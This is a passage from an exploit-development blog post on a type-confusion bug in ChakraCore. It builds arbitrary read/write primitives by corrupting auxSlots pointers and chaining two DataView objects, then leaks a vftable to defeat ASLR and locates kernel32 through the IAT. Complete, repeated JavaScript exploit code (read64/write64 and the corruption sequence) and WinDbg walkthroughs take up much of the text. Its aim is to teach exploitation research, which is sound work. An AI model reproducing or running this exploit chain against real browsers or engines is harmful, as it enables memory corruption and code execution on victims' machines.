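Because both halves are written little-endian at adjacent offsets, the eight bytes in the buffer form the same layout a native 64-bit pointer would have.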

Lastly, we know how we can act on the DataView object, but how do we actually view the object in memory? Where does the buffer property of DataView come from, as we saw from our debugging? We can set a breakpoint on our original function, chakracore!Js::DataView::EntrySetUint32. When we hit this breakpoint, we then can set a breakpoint on the SetValue() function, at the end of the EntrySetUint32 function, which passes the pointer to the in-scope DataView object via RCX.

If we examine this value in WinDbg, we can clearly see this is our DataView object. Notice the object layout below - this is a dynamic object, but since it is a builtin JavaScript type, the layout is slightly different.

The most important thing for us to note is twofold: the vftable pointer still exists at the beginning of the object, and at offset 0x38 of the DataView object we have a pointer to the buffer. We can confirm this by setting a hardware breakpoint to pause execution anytime DataView.buffer is written to in a 4-byte (32-bit) boundary.

We now know where in a DataView object the buffer is stored, and we have confirmed how, and in what ways, this buffer can be written to.

Let’s now chain this knowledge together with what we have previously accomplished to gain a read/write primitive.

Read/Write Primitive

Building upon our knowledge of DataView objects from the “DataView Objects” section and armed with our knowledge from the “Chakra/ChakraCore Exploit Primitives” section, where we saw how it would be possible to control the auxSlots pointer with an address of another JavaScript object we control in memory, let’s see how we can put these two together in order to achieve a read/write primitive.

Let’s recall two previous images, where we corrupted our o object’s auxSlots pointer with the address of another object, obj, in memory.

From the above images, we can see our current layout in memory, where o.a now controls the vftable of the obj object and o.b controls the type pointer of the obj object. But what if we had a property c within o (o.c)?

From the above image, we can clearly see that if there was a property c of o (o.c), it would therefore control the auxSlots pointer of the obj object, after the type confusion vulnerability. This essentially means that we can force obj to point to something else in memory. This is exactly what we would like to do in our case. We would like to do the exact same thing we did with the o object (corrupting the auxSlots pointer to point to another object in memory that we control). Here is how we would like this to look.

By setting o.c to a DataView object, we can control the entire contents of the DataView object by acting on the obj object! This is the same scenario shown above, where the auxSlots pointer was overwritten with the address of another object and we saw we could fully control that object (vftable and all metadata) by acting on the corrupted object! This is because ChakraCore, again, still treats auxSlots as though it hasn’t been overwritten with another value. When we try to access obj.a in this case, ChakraCore fetches the auxSlots pointer stored at obj+0x10 and then tries to index that memory at an offset of 0. Since that is now another object in memory (in this case a DataView object), obj.a will still gladly fetch whatever is stored at an offset of 0, which is the vftable for our DataView object! This is also the reason we declared obj with so many properties, as a DataView object has a few more hidden properties than a standard dynamic object. Declaring obj with many properties gives us access to all of the needed properties of the DataView object, since we aren’t stopping at dataview+0x10, as we have been with other objects where we only cared about the auxSlots pointer.

This is where things really start to pick up. We know that DataView.buffer is stored as a pointer. This can clearly be seen below by our previous investigative work on understanding DataView objects.

In the above image, we can see that DataView.buffer is stored at an offset of 0x38 within the DataView object. In the previous image, the buffer is a pointer in memory which points to the memory address 0x1a239afb2d0. This is the address of our buffer. Anytime we do dataview.setUint32() on our DataView object, this address will be updated with the contents. This can be seen below.

Knowing this, what if we were able to go from this:

To this:

What this would mean is that the buffer address, previously shown above, would be corrupted with the base address of kernel32.dll. This means anytime we acted on our DataView object with a method such as setUint32() we would actually be overwriting the contents of kernel32.dll (note that there are obviously parts of a DLL that are read-only, read/write, or read/execute)! This is also known as an arbitrary write primitive! If we have the ability to leak data, we can obviously use our DataView object with the builtin methods to read and write from the corrupted buffer pointer, and we can obviously use our type confusion (as we have done by corrupting auxSlots pointers so far) to corrupt this buffer pointer with whatever memory address we want! The issue that remains, however, is the NaN-boxing dilemma.

As we can see in the above image, we can overwrite the buffer pointer of a DataView object by using the obj.h property. However, as we saw in JavaScript, if we try to set a value on an object such as obj.h = kernel32_base_address, our value will remain mangled. The only way we can get around this is through our DataView object, which can write raw 64-bit values.

The way we will actually address the above issue is to leverage two DataView objects! Here is how this will look in memory.

The above image may look confusing, so let’s break this down and also examine what we are seeing in the debugger.

This memory layout is no different than the others we have discussed. There is a type confusion vulnerability where the auxSlots pointer for our o object is actually the address of an obj object we control in memory. ChakraCore interprets this object as an auxSlots pointer, and we can use property o.c, which would be the third index into the auxSlots array had it not been corrupted. This entry in the auxSlots array is stored at auxSlots+0x10, and since auxSlots is really another object, this allows us to overwrite the auxSlots pointer of the obj object with a JavaScript object.

We overwrite the auxSlots array of the obj object we created, which has many properties. This is because obj->auxSlots was overwritten with a DataView object, which has many hidden properties, including a buffer property. Having obj declared with so many properties allows us to overwrite said hidden properties, such as the buffer pointer, which is stored at an offset of 0x38 within a DataView object. Since dataview1 is being interpreted as an auxSlots pointer, we can use obj (which previously would have been stored in this array) to have full access to overwrite any of the hidden properties of the dataview1 object. We want to set this buffer to an address we want to arbitrarily write to (like the stack for instance, to invoke a ROP chain). However, since JavaScript prevents us from setting obj.h with a raw 64-bit address, due to NaN-boxing, we have to overwrite this buffer with another JavaScript object address. Since DataView objects expose methods that can allow us to write a raw 64-bit value, we overwrite the buffer of the dataview1 object with the address of another DataView object.
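The relationship between the properties of obj and the offsets they touch can be sketched with a little arithmetic. This assumes, as the post describes, that each slot is 8 bytes wide and that properties a through j occupy indexes 0 through 9 of what ChakraCore believes is the auxSlots array. The names SLOT_SIZE, props, and slotOffset are hypothetical and exist only for this illustration.

```javascript
// Illustrative only: which offset inside the "auxSlots" memory each property of obj touches.
// Assumes 8-byte slots and properties a..j occupying indexes 0..9, as in this post.
const SLOT_SIZE = 8;
const props = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"];

function slotOffset(name) {
    const index = props.indexOf(name);
    if (index === -1) throw new Error("unknown property: " + name);
    return index * SLOT_SIZE;
}

for (const name of props) {
    console.log("obj." + name + " -> auxSlots+0x" + slotOffset(name).toString(16));
}
```

Under these assumptions the third property lands at +0x10 and the eighth at +0x38, which is why o.c reaches the auxSlots pointer of obj and obj.h reaches the buffer pointer of dataview1.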

Again, we opt for this method because we know obj.h is the property we could update which would overwrite dataview1->buffer. However, JavaScript won’t let us set a raw 64-bit value which we can use to read/write memory from to bypass ASLR and write to the stack and hijack control-flow. Because of this, we overwrite it with another DataView object.

Because dataview1->buffer = dataview2, we can now use the methods exposed by DataView (via our dataview1 object) to write to the dataview2 object’s buffer property with a raw 64-bit address! This is because methods like setUint32(), which we previously saw, allow us to do so! We also know that buffer is stored at an offset of 0x38 within a DataView object, so if we execute the following JavaScript, we can update dataview2->buffer to whatever raw 64-bit value we want to read/write from:

// Recall we can only set 32-bits at a time
// Start with 0x38 (dataview2->buffer) and write 4 bytes
dataview1.setUint32(0x38, 0x41414141, true);		// Overwrite the lower 4 bytes of dataview2->buffer with 0x41414141

// Overwrite the next 4 bytes (0x3C offset into dataview2) to fully corrupt bytes 0x38-0x40 (the pointer for dataview2->buffer)
dataview1.setUint32(0x3C, 0x41414141, true);		// Overwrite the upper 4 bytes of dataview2->buffer with 0x41414141

Now dataview2->buffer would be overwritten with 0x4141414141414141. Let’s consider the following code now:

dataview2.setUint32(0x0, 0x42424242, true);
dataview2.setUint32(0x4, 0x42424242, true);

If we invoke setUint32() on dataview2, we do so at an offset of 0. This is because we are not attempting to corrupt any other objects; we are intending to use dataview2.setUint32() in a legitimate fashion. When dataview2.setUint32() is invoked, it will fetch the address of the buffer from dataview2 by locating dataview2+0x38, dereferencing the address, and attempting to write the value 0x4242424242424242 (as seen above) into the address.

The issue, however, is that we used a type confusion vulnerability to update dataview2->buffer to a different address (in this case an invalid address of 0x4141414141414141). This is the address dataview2 will now attempt to write to, which obviously will cause an access violation.
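The chain of two DataView objects can be easier to follow as a toy model. The sketch below is not exploit code: one flat buffer stands in for process memory, all addresses are made up, and modelSetUint32 is a hypothetical stand-in for what setUint32() does internally according to the debugging above (fetch the buffer pointer at +0x38, then write 4 bytes relative to it).

```javascript
// Toy model only: one flat byte array stands in for process memory.
// All addresses below are made up for illustration.
const memory = new DataView(new ArrayBuffer(0x400));
const BUFFER_FIELD = 0x38;   // offset of the buffer pointer inside a DataView (from this post)

const DATAVIEW1 = 0x100;     // fake address of dataview1
const DATAVIEW2 = 0x200;     // fake address of dataview2
const TARGET = 0x300;        // fake address we want to write to

// Read the 64-bit buffer pointer of the fake DataView at objAddr
function bufferOf(objAddr) {
    const lo = memory.getUint32(objAddr + BUFFER_FIELD, true);
    const hi = memory.getUint32(objAddr + BUFFER_FIELD + 4, true);
    return hi * 0x100000000 + lo;
}

// Model of setUint32(): fetch the buffer pointer, then write 4 bytes at buffer+offset
function modelSetUint32(objAddr, offset, value) {
    memory.setUint32(bufferOf(objAddr) + offset, value, true);
}

// Step 1 (obj.h = dataview2 in the post): dataview1->buffer now holds dataview2's address
memory.setUint32(DATAVIEW1 + BUFFER_FIELD, DATAVIEW2, true);

// Step 2: writes through dataview1 at 0x38/0x3C land on dataview2->buffer
modelSetUint32(DATAVIEW1, 0x38, TARGET);
modelSetUint32(DATAVIEW1, 0x3C, 0x0);

// Step 3: writes through dataview2 now land on the target
modelSetUint32(DATAVIEW2, 0x0, 0x41414141);
modelSetUint32(DATAVIEW2, 0x4, 0x41414141);

console.log(memory.getUint32(TARGET, true).toString(16), memory.getUint32(TARGET + 4, true).toString(16));
```

In the real exploit the target would be a raw 64-bit address rather than an index into a JavaScript buffer, but the order of operations is the same.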

Let’s do a test run of an arbitrary write primitive to overwrite the first 8 bytes of the .data section of kernel32.dll (which is writable) to see this in action. To do so, let’s update our exploit.js script to the following:

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    // Print debug statement
    print("DEBUG");

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // Set dataview2->buffer to kernel32.dll .data section (which is writable)
    dataview1.setUint32(0x38, 0x5b3d0000+0xa4000, true);
    dataview1.setUint32(0x3C, 0x00007fff, true);

    // Overwrite kernel32.dll's .data section's first 8 bytes with 0x4141414141414141
    dataview2.setUint32(0x0, 0x41414141, true);
    dataview2.setUint32(0x4, 0x41414141, true);
}

main();

Note that in the above code, the base address of the .data section of kernel32.dll can be found with the following WinDbg command: !dh kernel32. Recall also that we can only write/read in 32-bit boundaries, as DataView (in Chakra/ChakraCore) only supplies methods that work on unsigned integers as high as a 32-bit boundary. There are no direct 64-bit writes.

Our target address will be kernel32_base + 0xA4000, based on our current version of Windows 10.
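Since the address has to be supplied as two 32-bit halves, a small helper can do the split. This is a sketch only: splitAddress is a hypothetical name, and the base address and offset are the sample values used in this post, which will differ on other systems and after every reboot.

```javascript
// Illustrative only: split a user-mode address into the two 32-bit halves setUint32() needs.
// Plain Numbers are exact up to 2^53, which covers 47-bit user-mode addresses.
function splitAddress(addr) {
    const lo = addr % 0x100000000;               // lower 32 bits
    const hi = Math.floor(addr / 0x100000000);   // upper 32 bits
    return { lo: lo, hi: hi };
}

const kernel32Base = 0x7fff5b3d0000;   // sample base address used in this post
const dataOffset = 0xa4000;            // .data offset used in this post

const target = splitAddress(kernel32Base + dataOffset);
console.log("lo = 0x" + target.lo.toString(16) + ", hi = 0x" + target.hi.toString(16));
```

Arithmetic division is used instead of bitwise operators because JavaScript bitwise operators truncate their operands to 32 bits.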

Let’s now run our exploit.js script in ch.exe, by way of WinDbg.

To begin the process, let’s first set a breakpoint on our first print() debug statement via ch!WScriptJsrt::EchoCallback. When we hit this breakpoint, after resuming execution, let’s set a breakpoint on chakracore!Js::DynamicTypeHandler::AdjustSlots. We aren’t particularly interested in this function, which as we know will perform the type transition on our o object as a result of the tmp object having its prototype set, but we know that in the call stack we will see the address of the JIT’d function opt(), which performs the type confusion vulnerability.

Examining the call stack, we can clearly see our opt() function.

Let’s set a breakpoint on the instruction which will overwrite the auxSlots pointer of the o object.

We can inspect R15 and R11 to confirm that we have our o object, whose auxSlots pointer is about to be overwritten with the obj object.

We can clearly see that the o->auxSlots pointer is updated with the address of obj.

This is exactly how we would expect our vulnerability to behave. After the opt(o, o, obj) function is called, the next step in our script is the following:

// Corrupt obj->auxSlots with the address of the first DataView object
o.c = dataview1;

We know that by setting a value on o.c we will actually end up corrupting obj->auxSlots with the address of our first DataView object. Recalling the previous image, we know that obj->auxSlots is located at 0x12b252a52b0.

Let’s set a hardware breakpoint to break whenever this address is written to at an 8-byte alignment.

Taking a look at the disassembly, it is clear to see how SetSlotUnchecked indexes the auxSlots array (or what it thinks is the auxSlots array) by computing an index into an array.

Let’s take a look at the RCX register, which should be obj->auxSlots (located at 0x12b252a52b0).

However, we can see that the value is no longer the auxSlots array, but is actually a pointer to a DataView object! This means we have successfully overwritten obj->auxSlots with the address of our dataview1 DataView object!

Now that our o.c = dataview1 operation has completed, we know the next instruction will be as follows:

// Corrupt dataview1->buffer with the address of the second DataView object
obj.h = dataview2;

Let’s update our script to set our print() debug statement right before the obj.h = dataview2 instruction and restart execution in WinDbg.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Print debug statement
    print("DEBUG");

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // Set dataview2->buffer to kernel32.dll .data section (which is writable)
    dataview1.setUint32(0x38, 0x5b3d0000+0xa4000, true);
    dataview1.setUint32(0x3C, 0x00007fff, true);

    // Overwrite kernel32.dll's .data section's first 8 bytes with 0x4141414141414141
    dataview2.setUint32(0x0, 0x41414141, true);
    dataview2.setUint32(0x4, 0x41414141, true);
}

main();

We know from our last debugging session that the function chakracore!Js::DynamicTypeHandler::SetSlotUnchecked was responsible for updating o.c = dataview1. Let’s set another breakpoint here to view our obj.h = dataview2 line of code in action.

After hitting the breakpoint, we can examine the RCX register, which contains the in-scope dynamic object passed to the SetSlotUnchecked function. We can clearly see this is our obj object, as obj->auxSlots points to our dataview1 DataView object.

We can then set a breakpoint on our final mov qword ptr [rcx+rax*8], rdx instruction, which we previously have seen, which will perform our obj.h = dataview2 instruction.

After hitting the instruction, we can see that our dataview1 object is about to be operated on, and we can see that the buffer of our dataview1 object currently points to 0x24471ebed0.

After the write operation, we can see that dataview1->buffer now points to our dataview2 object.

Again, to reiterate, we can do this type of operation because of our type confusion vulnerability, where ChakraCore doesn’t know we have corrupted obj->auxSlots with the address of another object, our dataview1 object. When we execute obj.h = dataview2, ChakraCore treats obj as still having a valid auxSlots pointer, which it doesn’t, and it will attempt to update the obj.h entry within auxSlots (which is really a DataView object). Because dataview1->buffer is stored where ChakraCore thinks obj.h is stored, we corrupt this value to the address of our second DataView object, dataview2.

Let’s now set a breakpoint, as we saw earlier in the blog post, on the setUint32() method of our DataView object, which will perform the final object corruption and, shortly, our arbitrary write. We also can entirely clear out all other breakpoints.

After hitting our breakpoint, we can then scroll through the disassembly of EntrySetUint32() and set a breakpoint on chakracore!Js::DataView::SetValue, as we have previously showcased in this blog post.

After hitting this breakpoint, we can scroll through the disassembly and set a final breakpoint on the other SetValue() method.

Within this method function, we know mov dword ptr [rax], ecx is the instruction responsible ultimately for writing to the in-scope DataView object’s buffer. Let’s clear out all breakpoints, and focus solely on this instruction.

After hitting this breakpoint, we know that RAX will contain the address we are going to write into. As we talked about in our exploitation strategy, this should be dataview2->buffer. We are going to use the setUint32() method provided by dataview1 in order to overwrite dataview2->buffer’s address with a raw 64-bit value (broken up into two write operations).

Looking in the RCX register above, we can also actually see the “lower” part of kernel32.dll’s .data section - the target address we would like to perform an arbitrary write to.

We now can step through the mov dword ptr [rax], ecx instruction and see that dataview2->buffer has been partially overwritten (the lower 4 bytes) with the lower 4 bytes of kernel32.dll’s .data section!

Perfect! We can now press g in the debugger to hit the mov dword ptr [rax], ecx instruction again. This time, the setUint32() operation should write the upper part of the kernel32.dll .data section’s address, thus completing the full pointer-sized arbitrary write primitive.

After hitting the breakpoint and stepping through the instruction, we can inspect RAX again to confirm this is dataview2 and we have fully corrupted the buffer pointer with an arbitrary 64-bit address with no NaN-boxing effect! This is perfect, because the next time dataview2 goes to set its buffer, it will use the kernel32.dll address we provided, thinking this is its buffer! Because of this, whatever value we now supply to dataview2.setUint32() will actually overwrite kernel32.dll’s .data section! Let’s view this in action by again pressing g in the debugger to see our dataview2.setUint32() operations.

As we can see below, when we hit our breakpoint again the buffer address being used is located in kernel32.dll, and our setUint32() operation writes 0x41414141 into the .data section! We have achieved an arbitrary write!

We then press g in the debugger once more, to write the other 32-bits. This leads to a full 64-bit arbitrary write primitive!

Perfect! What this means is that we can first set dataview2->buffer, via dataview1.setUint32(), to any 64-bit address we would like to overwrite. Then we can use dataview2.setUint32() in order to overwrite the provided 64-bit address! This also holds true anytime we would like to arbitrarily read/dereference memory!

Just as with the write primitive, we simply set dataview2->buffer to whatever address we would like to read from. Then, instead of using the setUint32() method to overwrite the 64-bit address, we use the getUint32() method, which will instead read whatever is located at dataview2->buffer. Since dataview2->buffer contains the 64-bit address we want to read from, two 4-byte getUint32() calls read 8 bytes from here, meaning we can read/write in 8 byte boundaries!

Here is our full read/write primitive code.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
	return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
	// Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
	var arrayRead = new Uint32Array(0x10);
	arrayRead[0] = dataview2.getUint32(0x0, true); 	// 4-byte arbitrary read
	arrayRead[1] = dataview2.getUint32(0x4, true);	// 4-byte arbitrary read

	// Return the array
	return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
	dataview2.setUint32(0x0, valLo, true);		// 4-byte arbitrary write
	dataview2.setUint32(0x4, valHi, true);		// 4-byte arbitrary write
}

// Function used to set the prototype of the tmp object to cause a type transition on the o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // From here we can call read64() and write64()
}

main();

We can see we added a few things above. The first is our hex() function, which really is just for “pretty printing” purposes. It allows us to convert a value to hex, which is obviously how user-mode addresses are represented in Windows.

Secondly, we can see our read64() function. This is practically identical to what we displayed with the arbitrary write primitive. We use dataview1 to corrupt the buffer of dataview2 with the address we want to read from. However, instead of using dataview2.setUint32() to overwrite our target address, we use the getUint32() method, twice, to retrieve 0x8 bytes from our target address.

Lastly, write64() is identical to the earlier code where we walked through the process of performing an arbitrary write. We have simply “templatized” the read/write process to make our exploitation much more efficient.
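Because read64() returns its result as two 32-bit halves, printing a leaked pointer takes one extra step. The helper below, formatPtr, is a hypothetical addition that is not part of the exploit; it simply joins the halves into a single zero-padded hex string. The sample array stands in for a real read64() result and its values are made up.

```javascript
// Hypothetical helper: turn the [lo, hi] pair returned by read64() into one hex string
function formatPtr(pair) {
    const hi = pair[1].toString(16).padStart(8, "0");
    const lo = pair[0].toString(16).padStart(8, "0");
    return "0x" + hi + lo;
}

// Stand-in for a read64() result; these sample values are made up for illustration
const sample = new Uint32Array([0x5b474000, 0x00007fff]);
console.log(formatPtr(sample));
```

Padding the lower half matters: without it, a low half such as 0x00001000 would be printed as 1000 and the combined string would describe the wrong address.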

With a read/write primitive, the next step for us will be bypassing ASLR so we can reliably read/write data in memory.

Bypassing ASLR - Chakra/ChakraCore Edition

When it comes to bypassing ASLR, in “modern” exploitation, this requires an information leak. The 64-bit address space is too large to “brute force”, so we must find another approach. Thankfully, for us, the way Chakra/ChakraCore lays out JavaScript objects in memory will allow us to use our type confusion vulnerability and read primitive to leak a chakracore.dll address quite easily. Let’s recall the layout of a dynamic object in memory.

As we can see above, and as we can recall, the first hidden property of a dynamic object is the vftable. This will always point somewhere into chakracore.dll, and chakra.dll within Edge. Because of this, we can simply use our arbitrary read primitive to set our target address we want to read from to the vftable pointer of the dataview2 object, for instance, and read what this address contains (which is a pointer in chakracore.dll)! This concept is very simple, but we actually can more easily perform it by not using read64(). Here is the corresponding code.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
	// Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
	var arrayRead = new Uint32Array(0x10);
	arrayRead[0] = dataview2.getUint32(0x0, true); 	// 4-byte arbitrary read
	arrayRead[1] = dataview2.getUint32(0x4, true);	// 4-byte arbitrary read

	// Return the array
	return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
	dataview2.setUint32(0x0, valLo, true);		// 4-byte arbitrary write
	dataview2.setUint32(0x4, valHi, true);		// 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0, true);
    vtableHigh = dataview1.getUint32(4, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
}

main();

We know that in read64() we first corrupt dataview2->buffer with the target address we want to read from by using dataview1.setUint32(0x38...). This is because buffer is located at an offset of 0x38 within a DataView object. However, since dataview1 already acts on the dataview2 object, and we know that the vftable takes up bytes 0x0 through 0x8, as it is the first item of a DataView object, we can simply use our ability to control dataview2, via dataview1 methods, to retrieve whatever is stored at bytes 0x0 - 0x8, which is the vftable! This is the only time we will perform a read without going through our read64() function (for the time being). This concept is fairly simple, and can be seen in the diagram below.

However, instead of using setUint32() methods to overwrite the vftable, we use the getUint32() method to retrieve the value.

Another thing to notice is we have broken up our read into two parts. This, as we remember, is because we can only read/write 32-bits at a time - so we must do it twice to achieve a 64-bit read/write.
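To make the two-part read concrete, here is a small standalone sketch that has nothing to do with the vulnerability itself. It uses an ordinary (uncorrupted) DataView over an 8-byte buffer holding a made-up pointer value, and shows that two little-endian 32-bit reads at offsets 0x0 and 0x4 give us the low and high halves of a 64-bit value. readQwordHalves() is a hypothetical helper name.

```javascript
// Ordinary 8-byte buffer standing in for "the first 8 bytes of an object"
const demoBuffer = new ArrayBuffer(8);
const demoView = new DataView(demoBuffer);

// Store a made-up 64-bit pointer, 0x00007ff8a1b61298, in little-endian order
demoView.setUint32(0x0, 0xa1b61298, true);   // low 32 bits live at offset 0x0
demoView.setUint32(0x4, 0x00007ff8, true);   // high 32 bits live at offset 0x4

// Hypothetical helper: read a 64-bit value as [low, high] 32-bit halves
function readQwordHalves(view, offset) {
    const low = view.getUint32(offset, true);
    const high = view.getUint32(offset + 4, true);
    return [low, high];
}

const [demoLo, demoHi] = readQwordHalves(demoView, 0x0);
console.log("0x" + demoHi.toString(16) + demoLo.toString(16));
```

The third argument (true) requests little-endian byte order, which matches how x64 stores pointers in memory.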

It is important to note that we will not step through every read64() and write64() function call in the debugger. This is because we have already viewed our arbitrary write primitive in action, in great detail, within WinDbg. We already know what it looks like to corrupt dataview2->buffer using the builtin DataView method setUint32(), and then to use the same method, on behalf of dataview2, to actually overwrite the buffer with our own data. Because of this, anything performed from here on out in WinDbg will be purely for exploitation reasons. Here is what this looks like when executed in ch.exe.

If we inspect this address in the debugger, we can clearly see this is the vftable leaked from DataView!

From here, we can compute the base address of chakracore.dll by determining the offset between the vftable entry leak and the base of chakracore.dll.

The updated code to leak the base address of chakracore.dll can be found below:

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
}

main();

Please note that we will omit all code before opt(o, o, obj) from here on out. This is to save space, and because we won’t be changing any code before then. Notice also, again, we have to store the 64-bit address into two separate variables. This is because we can only access data types up to 32-bits in JavaScript (in terms of Chakra/ChakraCore).
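One thing the subtraction on the lower half quietly assumes is that the lower 32 bits of the leaked pointer are larger than the offset being subtracted. That held in our runs, but if it ever did not, the result would go negative and the upper half would need to be decremented. The following is a minimal sketch of a borrow-aware subtraction; sub64() is a hypothetical helper, and the input values are made up.

```javascript
// Hypothetical helper: subtract a small offset from a 64-bit value
// that is stored as two unsigned 32-bit halves.
function sub64(lo, hi, delta) {
    let newLo = lo - delta;
    let newHi = hi;

    // If the low half underflowed, borrow from the high half
    if (newLo < 0) {
        newLo += 0x100000000;
        newHi -= 1;
    }
    return [newLo >>> 0, newHi >>> 0];
}

// No borrow needed: low half is larger than the offset
console.log(sub64(0x1971298, 0x7ff8, 0x1961298).map(v => v.toString(16)));

// Borrow needed: low half is smaller than the offset
console.log(sub64(0x1000, 0x7ff8, 0x2000).map(v => v.toString(16)));
```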

For any kind of code execution, on Windows, we know we will need to resolve needed Windows API function addresses. Our exploit, for this part of the blog series, will invoke WinExec to spawn calc.exe (note that in part three we will be achieving a reverse shell, but since that exploit is much more complex, we first will start by just showing how code execution is possible).

On Windows, the Import Address Table (IAT) stores these needed pointers in a section of the PE. Remember that chakracore.dll isn’t loaded into the process space until ch.exe has executed our exploit.js. So, to view the IAT, we need to run our exploit.js, by way of ch.exe, in WinDbg. We need to set a breakpoint on our print() function by way of ch!WScriptJsrt::EchoCallback.

From here, we can run !dh chakracore to see where the IAT is for chakracore, which should contain a table of pointers to Windows API functions leveraged by ChakraCore.

After locating the IAT, we can simply just dump all the pointers located at chakracore+0x17c0000.

As we can see above, chakracore_iat+0x40 contains a pointer to kernel32.dll (specifically, kernel32!RaiseExceptionStub). We can use our read primitive on this address in order to leak an address from kernel32.dll, and then compute the base address of kernel32.dll by the same method shown with the vftable leak.
